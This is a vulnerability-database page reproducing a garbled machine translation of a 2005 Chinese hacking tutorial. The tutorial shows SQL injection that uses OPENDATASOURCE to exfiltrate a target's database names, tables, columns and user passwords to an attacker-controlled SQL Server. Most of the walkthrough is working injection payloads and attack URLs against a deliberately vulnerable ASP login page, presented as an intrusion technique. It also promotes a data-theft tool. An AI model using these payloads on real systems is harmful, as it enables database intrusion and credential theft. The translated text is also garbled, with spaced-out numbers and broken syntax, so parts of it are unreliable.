Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
myhack58佚名MYHACK58:6220055268
HistoryDec 10, 2005 - 12:00 a.m.

Replace the small bamboo of the NBSI2: the Opendatasource And Openrowset-vulnerability warning-the black bar safety net

2005-12-1000:00:00
佚名
www.myhack58.com
57
JSON

Currently on the market of SQL Injection tools a lot, the most respected is the NBSI2. SQL Injection method on the Internet is everywhere, everyone serious to learn it will soon become the script of the invasion“master”it. But whether it is tools, or numerous methods, to guess the SQL data when the principle is nothing more than two kinds: one is the other’sthe WEB serverwithout closing the error message when the SQL error to storm out of the desired information; one is on the other side of theWEB serverto close the error prompt when using ASCII code split half analysis. When closing the error message, guess the data will be very slow, the encounter speed of a snail’s time is really urgent the dead, NBSI2 at this time also often there will be“guess wrong, and whether you want to retry”in the warning dialog box, that’s trouble. But with Opendatasource and Openrowset these two functions, everything should be edge and understanding.
In the SQL Books Online explained, is not defined as a linked server name of the OLE DB data source not commonly used in a query, use the special name. In the SQL Server 2 0 0 0, the Openrowset and the Opendatasource function provides connection information to and from OLE DB data sources to access data. Openrowset and Opendatasource should only be in reference to not normally access the OLE DB data source when using. The need for regular access to the data source, you should define a linked server. Regardless of the Opendatasource or Openrowset can not provide a link to the server definition of all functions, including security management and query directory information. Each call to these functions, you must provide all connection information, including passwords. In simple terms, the two macro that is not dependent on the linked server for distributed search follow.
As with the Openrowset function to directly get injected into the database of the information tools already have, I will not do detailed manual to explain, in the article tail I will introduce this tools for simple usage, I here focus on to introduce the Opendatasource use. Books Online for Opendatasource macros usage example in the following format:

SELECT *
FROM Opendatasource(
’SQLOLEDB’,
’Data Source=ServerName;User ID=MyUID;Password=MyPass’
). Northwind. dbo. Categories

We can use this statement to get the database library name, Table Name, column name, field, values of all information-if you still do not understand, then see me show.
I’m in the 1 9 2. 1 6 8. 8. 1 0 This table on the server to build a test environment, wrote a vulnerable ASP code. Two pieces of code in e. the asp code is as follows:
<form action=f. the asp method=get>
Account lcx<br>
Password<input type=text size=1 0 0 name=password>
<input type=submit value=submit>
</form>
f. the asp code is as follows:

| <%
strSQLServerName = “127.0.0.1”
strSQLDBUserName = “sa”
strSQLDBPassword = “lcx”
strSQLDBName = “bbsuser”
Set conn = Server. CreateObject(“ADODB. Connection”)
strCon = “Provider=SQLOLEDB. 1;Persist Security Info=False;Server=” & amp; strSQLServerName & “;User ID=” & amp; strSQLDBUserName & “;Password=” & amp; strSQLDBPassword & “;Database=” & amp; strSQLDBName & “;”
conn. open strCon
sql2=“select * from bbsuser where username=’admin’ and password=’”&request(“password”)&“’”
set rs2=conn. execute(sql2)
%>
<br>
<%=" executed SQL statement is"&amp; sql2%>
<%
rs2. close
set rs2=nothing
conn. close
set conn=nothing
%>

When in the text box to submit“1’and db_name()>0”when the
I’m on another server 1 9 2. 1 6 8. 8. 2 0 installed a SQL Server, the sa password is the lcx on. Because the Opendatasource macros go is the TCP Protocol, so you want to ensure the 1 9 2. 1 6 8. 8. 2 0 1 4 3 3 The port must be 1 9 2. 1 6 8. 8. 1 0 access to. OK, test environment build is completed, the following look at how the invasion.

Tip: SQL Server SP2 version if the default install in Windows XP SP2 the following words, 1 4 3 port 3 is not going to be the outside world access to, it is need to note that recommendations marked with SP3 patch.

The first step: get all the current library name
We start in the 1 9 2. 1 6 8. 8. 2 0 built on the library and table names, if you in the Enterprise Manager graphical interface installed and I have no objection, I is the direct use of the search 循分 parser written statement:
create database lcx
CREATE TABLE ku(name nvarchar(2 5 6) null);
CREATE TABLE biao(id int NULL,name nvarchar(2 5 6) null);
So we built a library lcx, there are two tables, respectively, is ku and biao to. Ku this table holds a column name is name, The type is nvarchar(2 5 6), and biao this table holds the two column name, respectively, is the int type of the id and a nvarchar(2 5 6)type the name of the column name. Here the library name, Table Name, column names, the names are just given, as long as you ensure that the type of.
Let’s review a bit to get all the database names in the SQL statement, The code is“select name from master. dbo. sysdatabases”in. If you still don’t understand this sentence of code words, to be cramming. We use a statement obtained 1 9 2. 1 6 8. 8. 1 0 all databases on the server name.
insert into opendatasource(’sqloledb’,’server=192.168.8.20;uid=sa;pwd=lcx;database=lcx’). lcx. dbo. biao select name from master. dbo. sysdatabases–
In our test environment is:
http://192.168.8.10/web/f.asp?password=1’insert into opendatasource(’sqloledb’,’server=192.168.8.20;uid=sa;pwd=lcx;database=lcx’). lcx. dbo. ku select name from master. dbo. sysdatabases–

At this time you run go to 1 9 2. 1 6 8. 8. 2 0 SQL on look at KU this table, you will be surprised to find each other all of the library names have been neatly lined up.
Here many people may also have to worry about permissions issues, I can responsibly tell you that the Public permissions are also you can use Opendatasource for this macro.
Get all of the libraries, How do you know that is the current library? Ha, you put the statement change is not it? Change to the following look:
Insert into opendatasource(’sqloledb’,’server=192.168.8.20;uid=sa;pwd=lcx;database=lcx’). lcx. dbo. ku select db_name(0)–

Can? In Figure 4, bbsuser is we inject the current library, we have to get the current database of all table names.
Second step: get the current database of all table names
Statement:
insert into opendatasource(’sqloledb’,’server=192.168.8.20;uid=sa;pwd=lcx;database=lcx’). lcx. dbo. biao select [id],[name] from sysobjects where xtype=’U’–
This statement omitted the current library name is the current database of all table names. You can also put the statement into: the
insert into opendatasource(’sqloledb’,’server=192.168.8.20;uid=sa;pwd=lcx;database=lcx’). lcx. dbo. biao select [id],[name] from bbsuser. dbo. sysobjects where xtype=’U’–
We have to do the next test,
In this case, we then ran to the 1 9 2. 1 6 8. 8. 2 0 to see lcx. dbo. biao the data here, you will see what?
Aren’t we already get the current database of all table names? To learn you must ask, then how do I get other Library of all the table names? Very simple Ah, the basic statement in the following format:
insert into opendatasource(’sqloledb’,’server=192.168. 8. 2 0;uid=sa;pwd=lcx;database=lcx’). lcx. dbo. biao select [id],[name] from the library name. dbo. sysobjects where xtype=’U’–
Here the database name we in the first have guessed.
Third step: get column name
Did you see we get the first column name is a bbsuser, and its ID value is 3 5 7 5 7 6 3 1 2 It? With these two pieces of Information We to obtain the column name. In Access Column Name before we’re in the 1 9 2. 1 6 8. 8. 2 0 on first do step work, copy a system table structure. In my previous build of the lcx library to EXECUTE statement:
select * into [tmpcolumns] from syscolumns where 1=2
This will put the system table syscolumns in the structure is copied to the[tmpcolumns it.
We have to get bbsuser this table all the column names, because the ID value is 3 5 7 5 7 6 3 1 2, so our statement is:
insert into opendatasource(’sqloledb’,’server=192.168.8.20;uid=sa;pwd=lcx;database=lcx’). lcx. dbo. tmpcolumns select * from
syscolumns where id=3 5 7 5 7 6 3 1 2–

Then back to the 1 9 2. 1 6 8. 8. 2 0 look at the lcx. dbo. tmpcolum this table while what is the content,
See? Got bbsuser all the column names, and column names with some other information. Here’s the other information is also useful to us the next step to get the field value of the work ready. Here I only explain two of the column names mean. Wherein the length is you get the column name, length, xtype is you get the column name of the type. Maybe you want to ask, why get the type of how are 5 6, and 1 7 5 such numbers? I checked some information, find the number corresponding to the type of relationship, the relationship table as follows:
when 3 4 then ’image’
when 3 5 then ’text’
when 5 2 then ’smallint’
when 5 6 then ‘int’
when 6 1 then ’datetime’
when 6 2 then ’float’
when 1 0 8 then the ’numeric’
when 1 6 7 then ’varchar’
when 1 7 5 then ’char’
when 2 3 1 then ’nvarchar’
Step four: get field value
With the injection of the database the current database name, Table Name, column names, all the information that we can obtain this value. We start in the 1 9 2. 1 6 8. 8. 2 0 based on the information obtained in the lcx this library to build a new table bbsuser, the column name is id(type int length is 4), username(type char length 1 0), password(char type length is 1 to 0). If you don’t understand this step, you take a second look and that number and type of table. I’m in the 1 9 2. 1 6 8. 8. 2 0 Enterprise Manager has been built well.
Get injected into the database the current database all the information of the work to one step, the injected statement is as follows:
insert into opendatasource(’sqloledb’,’server=192.168.8.20;uid=sa;pwd=lcx;database=lcx’). lcx. dbo. bbsuser select * from [bbsuser] –
At the injection point on execution is:
http://192.168.8.10/web/f.asp?password=1’insert into opendatasource(’sqloledb’,’server=192.168.8.20;uid=sa;pwd=lcx;database=lcx’). lcx. dbo. bbsuser select * from [bbsuser] –
We look at the end how no success? To 1 9 2. 1 6 8. 8. 2 0 on the lcx. dbo. bbsuser up grab a map, nature is success.
Small tip: when in the Get field value, build the table name, column name, not necessarily with the implantation of the library is exactly the same, as long as the types match you can.

So we a step-by-step to the injection point of the current Library of all the information moved to the local. You may say my method is good, but after all, not with the tool cool. Currently I haven’t seen used Opendatasource to get the injection Information tool, I use Openrowset to get the injection Information tool I have found. Below I to simple introduction about its usage.
The tool is a foreigner to write, 名字是DataThiefV1.0.exe, the software running interface.
Like I want to inject http://192.168.8.10/web/f. asp? password=1 while building the environment.

Tip: If you inject the address of a character type in the URL address in the To write http://192.168.8.10/web/f. asp? password=1’; <>this format, to with single quotation marks. If it is Digital type, it is necessary to write into the http://192.168.8.10/web/f. asp? password=1; <>, remove the single quotes.

Point GO, get the information of the speed really fast Ah, estimated and my internal network to test for, huh.
If you’re on the Openrowset this macro don’t understand the words, your own capture analysis right, I will no longer wordy. Lastly, I hope this article for everyone to achieve the injection method more than an idea and inspiration, in this article the basis to further explore the Opendatasource and Openrowset usage.

JSON